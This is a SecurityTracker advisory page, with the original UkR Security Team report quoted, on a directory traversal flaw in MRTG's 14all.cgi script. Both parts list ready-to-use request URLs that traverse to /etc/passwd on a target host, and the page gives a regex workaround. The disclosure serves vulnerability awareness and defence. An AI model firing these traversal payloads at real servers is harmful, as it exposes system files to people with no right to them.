SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Multi Router Traffic Grapher (MRTG) RDD 14all.cgi Vendors:   [Multiple Authors/Vendors]
The '14all.cgi' Front End CGI Script for Multi Router Traffic Grapher (MRTG) Network Monitoring Application Has Input Validation Flaw That Discloses Portions of Files on the System to Remote Users
SecurityTracker Alert ID:  1003426
SecurityTracker URL:  http://securitytracker.com/id/1003426
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Feb 5 2002
Original Entry Date:  Feb 2 2002
Impact:   Disclosure of system information

Version(s): Mrtg/RRD 14all.cgi v1.1p15
Description:   UkR Security Team reported a vulnerability in the 14all.cgi front end for the Multi Router Traffic Grapher (MRTG) Round Robin Database (RDD) network monitoring and display application. A remote user can view portions of files on the system.

It is reported that the 14all.cgi script does not properly validate user-supplied input. The remote user can reportedly view the first string of any file on the system where script installed.

The following type of URLs can reportedly trigger the vulnerability:

http://[target]/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://[target]/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://[target]/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://[target]/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd

Impact:   A remote user can view the first string of any file on the system.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following workaround:

$input =~ s/[(\.\.)|\/]//g;

Vendor URL:  www.wh-hms.uni-ulm.de/~widi/14all/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  new advisory


                    ---=== UkR Security Team advisory 
===---
                   
Name          : MRTG CGI script "show files" Vulnerability
About         : The Multi Router Traffic Grapher (MRTG) is 
a tool to monitor the traffic
                 load on network-links. MRTG generates 
HTML pages containing GIF
                 images which provide a LIVE visual 
representation of this traffic
Product vendor: MRTG / http://www.mrtg.org
Problem       : Problem lyes in incorrect validation of 
user submitted
                 -by-browser information, that can show 
first string of any file of the
                 system where script installed. 
Workaround    : this will help in somewhat : $input =~ 
s/[(\.\.)|\/]//g;
Author        : UkR-XblP / UkR security team
Exploit       : 
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
                 http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
                 http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
                 http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC